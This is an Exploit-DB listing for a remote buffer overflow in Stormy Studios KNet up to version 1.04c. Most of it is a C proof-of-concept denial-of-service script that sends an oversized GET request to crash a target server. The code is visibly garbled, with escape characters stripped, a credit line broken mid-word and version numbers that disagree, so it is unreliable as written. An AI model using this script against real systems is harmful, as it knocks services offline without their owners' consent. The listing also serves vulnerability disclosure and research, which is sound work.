https://www.exploit-db.com/exploits/25165

漏洞细节尚未披露

source: http://www.securityfocus.com/bid/12671/info

A remote buffer overflow vulnerability affects Stormy Studios KNet. This issue is due to a failure of the application to securely copy user-supplied input into finite process buffers.

An attacker may leverage this issue to execute arbitrary code on a computer with the privileges of the affected server, facilitating unauthorized access. 

/*

      KNet <= 1.04c is affected to a remote buffer overflow in GET command.
   This PoC demostrate the vulnerability.

      KNet <= 1.04c PoC Denial Of Service Coded by: Expanders

      Usage: ./x0n3-h4ck_Knet-DoS.c <Host> <Port>

*/

#include <stdio.h>
#include <string.h>
#include <netdb.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>

void help(char *program_name);

int main(int argc, char *argv[]) {

    struct sockaddr_in trg;
    struct hostent *he;
 long addr;
    int sockfd, buff,rc;
 char evilbuf[1024];
 char buffer[1024];
 char *request;
 if(argc < 3 ) {
  help(argv[0]);
  exit(0);
 }
 printf("nn-=[ KNet <= 1.04c PoC DoS ::: Coded by Expanders ]=-n");
    he = gethostbyname(argv[1]);
    sockfd = socket(AF_INET, SOCK_STREAM, 0);
 request = (char *) malloc(12344);
    trg.sin_family = AF_INET;
    trg.sin_port = htons(atoi(argv[2]));
    trg.sin_addr = *((struct in_addr *) he->h_addr);
    memset(&(trg.sin_zero), '', 8);
 printf("nnConnecting to target t...");
 rc=connect(sockfd, (struct sockaddr *)&trg, sizeof(struct sockaddr_in));
 if(rc==0)
 {
  printf("[Done]nBuilding evil buffert...");
  memset(evilbuf,90,1023);
  printf("[Done]nSending evil request t...");
  sprintf(request,"GET %s nrnr",evilbuf);
  send(sockfd,request,strlen(request),0);
  printf("[Done]nn[Finished] Check the server nown");
 }
 else
  printf("[Fail] -> Unable to connectnn");
 close(sockfd);
 return 0;

}

void help(char *program_name) {

 printf("nt-=[ KNet <= 1.04b PoC Denial Of Service ]=-n");
 printf("t-=[ ]=-n");
 printf("t-=[ Coded by
ders -/www.x0n3-h4ck.org\- ]=-nn");
 printf("Usage: %s <Host> <Port>n",program_name);
}